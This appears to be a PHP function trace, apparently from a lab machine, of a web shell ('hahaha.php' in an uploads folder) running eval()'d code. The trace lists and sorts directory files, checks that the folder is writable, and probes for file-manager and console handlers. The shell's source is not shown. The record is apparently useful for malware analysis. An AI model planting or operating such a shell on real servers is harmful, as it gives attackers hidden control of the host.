4	173	0	0.021087	1525112	array_merge	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	916	2	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']	['type' => 'file']
4	173	1	0.021111	1525552
4	173	R			['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	916	$files[] = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	904	$i++
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	922	GLOBALS['sort'] = [0 => 'name', 1 => 1]
4	174	0	0.021186	1525512	usort	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	929	2	[0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]	'cmp'
5	175	0	0.021222	1525960	cmp	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	929	2	['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']	['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
6	176	0	0.021251	1525960	strtolower	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	1	'.htaccess'
6	176	1	0.021264	1525992
6	176	R			'.htaccess'
6	177	0	0.021279	1525960	strtolower	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	1	'hahaha.php'
6	177	1	0.021292	1525992
6	177	R			'hahaha.php'
6	178	0	0.021306	1525960	strcmp	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	2	'.htaccess'	'hahaha.php'
6	178	1	0.021320	1526024
6	178	R			-1
5	175	1	0.021334	1525960
5	175	R			-1
5	179	0	0.021347	1525960	cmp	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	929	2	['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
6	180	0	0.021379	1525960	strtolower	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	1	'hahaha.php'
6	180	1	0.021393	1525992
6	180	R			'hahaha.php'
6	181	0	0.021407	1525960	strtolower	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	1	'prepend.php'
6	181	1	0.021420	1525992
6	181	R			'prepend.php'
6	182	0	0.021434	1525960	strcmp	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	2	'hahaha.php'	'prepend.php'
6	182	1	0.021448	1526024
6	182	R			-1
5	179	1	0.021461	1525960
5	179	R			-1
4	174	1	0.021475	1525584
4	174	R			TRUE
4	183	0	0.021487	1525536	usort	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	930	2	[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']]	'cmp'
5	184	0	0.021516	1525984	cmp	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	930	2	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']	['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
6	185	0	0.021543	1525984	strtolower	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	1	'..'
6	185	1	0.021557	1526016
6	185	R			'..'
6	186	0	0.021570	1525984	strtolower	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	1	'data'
6	186	1	0.021583	1526016
6	186	R			'data'
6	187	0	0.021596	1525984	strcmp	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	925	2	'..'	'data'
6	187	1	0.021609	1526048
6	187	R			-3552051
5	184	1	0.021623	1525984
5	184	R			-3552051
4	183	1	0.021637	1525608
4	183	R			TRUE
4	188	0	0.021649	1525536	array_merge	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	931	2	[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']]	[0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
4	188	1	0.021695	1525976
4	188	R			[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 4 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	931	$files = [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=#FFDB5F><b>drwxrwxrwx</b></font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-r--r--</b></font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'hahaha.php', 'path' => '/var/www/html/uploads/hahaha.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rw-rw-r--</b></font>', 'size' => 71665, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 4 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 19:03:55', 'perms' => '<font color=white><b>-rwxr-xr-x</b></font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	932	$l = 0
4	189	0	0.021797	1525616	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'..'
4	189	1	0.021811	1525680
4	189	R			'..'
4	190	0	0.021826	1525744	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'..'
4	190	1	0.021840	1525936
4	190	R			'..'
4	191	0	0.021855	1525856	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'..'
4	191	1	0.021869	1525920
4	191	R			'..'
4	192	0	0.021882	1525984	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'..'
4	192	1	0.021895	1526048
4	192	R			'..'
4	193	0	0.021908	1526176	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'..'
4	193	1	0.021921	1526240
4	193	R			'..'
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	936	$l = 1
4	194	0	0.021946	1525632	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'data'
4	194	1	0.021959	1525696
4	194	R			'data'
4	195	0	0.021973	1525744	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'data'
4	195	1	0.021987	1525936
4	195	R			'data'
4	196	0	0.022001	1525856	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'data'
4	196	1	0.022019	1525920
4	196	R			'data'
4	197	0	0.022032	1525984	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'data'
4	197	1	0.022045	1526048
4	197	R			'data'
4	198	0	0.022058	1526176	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'data'
4	198	1	0.022071	1526240
4	198	R			'data'
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	936	$l = 0
4	199	0	0.022250	1525616	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'.htaccess'
4	199	1	0.022264	1525688
4	199	R			'.htaccess'
4	200	0	0.022278	1525664	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'.htaccess'
4	200	1	0.022292	1525736
4	200	R			'.htaccess'
4	201	0	0.022306	1525744	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'.htaccess'
4	201	1	0.022320	1525936
4	201	R			'.htaccess'
4	202	0	0.022335	1525728	viewSize	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	64
4	202	1	0.022350	1525760
4	202	R			'64 B'
4	203	0	0.022364	1525856	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'.htaccess'
4	203	1	0.022378	1525928
4	203	R			'.htaccess'
4	204	0	0.022392	1525984	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'.htaccess'
4	204	1	0.022405	1526056
4	204	R			'.htaccess'
4	205	0	0.022419	1526176	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'.htaccess'
4	205	1	0.022432	1526248
4	205	R			'.htaccess'
4	206	0	0.022445	1526176	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'.htaccess'
4	206	1	0.022458	1526248
4	206	R			'.htaccess'
4	207	0	0.022471	1526400	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'.htaccess'
4	207	1	0.022484	1526472
4	207	R			'.htaccess'
4	208	0	0.022497	1526496	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'.htaccess'
4	208	1	0.022510	1526568
4	208	R			'.htaccess'
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	936	$l = 1
4	209	0	0.022535	1525632	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'hahaha.php'
4	209	1	0.022549	1525704
4	209	R			'hahaha.php'
4	210	0	0.022563	1525696	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'hahaha.php'
4	210	1	0.022576	1525768
4	210	R			'hahaha.php'
4	211	0	0.022590	1525776	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'hahaha.php'
4	211	1	0.022604	1525968
4	211	R			'hahaha.php'
4	212	0	0.022618	1525760	viewSize	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	71665
5	213	0	0.022632	1525760	sprintf	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	295	2	'%1.2f'	69.9853515625
5	213	1	0.022648	1526144
5	213	R			'69.99'
4	212	1	0.022661	1525800
4	212	R			'69.99 KB'
4	214	0	0.022675	1525856	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'hahaha.php'
4	214	1	0.022689	1525928
4	214	R			'hahaha.php'
4	215	0	0.022703	1526048	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'hahaha.php'
4	215	1	0.022716	1526120
4	215	R			'hahaha.php'
4	216	0	0.022730	1526176	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'hahaha.php'
4	216	1	0.022743	1526248
4	216	R			'hahaha.php'
4	217	0	0.022756	1526176	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'hahaha.php'
4	217	1	0.022769	1526248
4	217	R			'hahaha.php'
4	218	0	0.022782	1526400	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'hahaha.php'
4	218	1	0.022795	1526472
4	218	R			'hahaha.php'
4	219	0	0.022808	1526560	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'hahaha.php'
4	219	1	0.022820	1526632
4	219	R			'hahaha.php'
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	936	$l = 0
4	220	0	0.022845	1525616	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'prepend.php'
4	220	1	0.022858	1525688
4	220	R			'prepend.php'
4	221	0	0.022875	1525664	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'prepend.php'
4	221	1	0.022889	1525736
4	221	R			'prepend.php'
4	222	0	0.022903	1525744	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'prepend.php'
4	222	1	0.022917	1525936
4	222	R			'prepend.php'
4	223	0	0.022931	1525760	viewSize	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	57
4	223	1	0.022945	1525792
4	223	R			'57 B'
4	224	0	0.022960	1525856	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	934	1	'prepend.php'
4	224	1	0.022973	1525928
4	224	R			'prepend.php'
4	225	0	0.022987	1525984	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'prepend.php'
4	225	1	0.023000	1526056
4	225	R			'prepend.php'
4	226	0	0.023014	1526176	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'prepend.php'
4	226	1	0.023027	1526248
4	226	R			'prepend.php'
4	227	0	0.023040	1526176	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'prepend.php'
4	227	1	0.023053	1526248
4	227	R			'prepend.php'
4	228	0	0.023066	1526400	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'prepend.php'
4	228	1	0.023078	1526472
4	228	R			'prepend.php'
4	229	0	0.023091	1526560	urlencode	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	935	1	'prepend.php'
4	229	1	0.023104	1526632
4	229	R			'prepend.php'
3		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	936	$l = 1
4	230	0	0.023129	1525536	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	941	1	'/var/www/html/uploads/'
4	230	1	0.023143	1525728
4	230	R			'/var/www/html/uploads/'
4	231	0	0.023159	1525536	class_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	947	1	'ZipArchive'
4	231	1	0.023174	1525576
4	231	R			FALSE
4	232	0	0.023189	1525536	hardFooter	1		/var/www/html/uploads/hahaha.php(1) : eval()'d code	954	0
5	233	0	0.023202	1525536	is_writable	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	240	1	'/var/www/html/uploads/'
5	233	1	0.023219	1525576
5	233	R			TRUE
4		A						/var/www/html/uploads/hahaha.php(1) : eval()'d code	240	$is_writable = ' <font color=\'#FFDB5F\'>[ Writeable ]</font>'
5	234	0	0.023247	1525536	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	245	1	'actionFilesMan'
5	234	1	0.023262	1525576
5	234	R			TRUE
5	235	0	0.023275	1525792	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	245	1	'/var/www/html/uploads/'
5	235	1	0.023290	1525984
5	235	R			'/var/www/html/uploads/'
5	236	0	0.023304	1525920	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	246	1	'actionFilesTools'
5	236	1	0.023319	1525960
5	236	R			TRUE
5	237	0	0.023332	1526176	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	248	1	'actionFilesMan'
5	237	1	0.023346	1526216
5	237	R			TRUE
5	238	0	0.023360	1526432	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	249	1	'actionFilesTools'
5	238	1	0.023374	1526472
5	238	R			TRUE
5	239	0	0.023387	1526816	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	251	1	'actionConsole'
5	239	1	0.023400	1526856
5	239	R			TRUE
5	240	0	0.023413	1526816	function_exists	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	252	1	'actionFilesMan'
5	240	1	0.023427	1526856
5	240	R			TRUE
5	241	0	0.023440	1527072	htmlspecialchars	0		/var/www/html/uploads/hahaha.php(1) : eval()'d code	254	1	'/var/www/html/uploads/'
5	241	1	0.023454	1527264
5	241	R			'/var/www/html/uploads/'
4	232	1	0.023470	1525536
3	35	1	0.023479	1518264
2	10	1	0.023487	1518264
1	3	1	0.023499	1475376
			0.023524	1391256
TRACE END   [2023-02-12 22:04:21.746354]

